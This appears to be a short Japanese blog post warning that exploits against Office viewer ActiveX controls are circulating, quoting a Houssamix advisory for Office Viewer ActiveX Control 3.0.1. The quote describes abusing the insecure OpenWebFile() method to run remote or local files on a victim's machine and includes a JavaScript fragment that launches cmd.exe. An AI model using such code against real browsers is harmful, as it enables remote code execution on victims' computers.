Office Viewer ActiveX Control 3.0.1 Remote File Execution Exploit(情報元のブックマーク数)
なんか、いやな予感・・・Office系のViewerActiveXを攻撃するExploitが出まくってる。Houssamixが流してるみたい。
=======================================================================================
Author: Houssamix
=======================================================================================Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit
download : http://www.anydraw.com/download/EOfficeOCX.exe
Tested on Windows XP Professional SP2 , with Internet Explorer 6
description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime
http://www.milw0rm.com/exploits/7749
u can also execute a local file in pc victime usign this methode "Open()" , just change the function do_it with this : <b>
function Do_it()
{
File = "c:\\windows\\system32\\cmd.exe"
hsmx.OpenWebFile(File)
}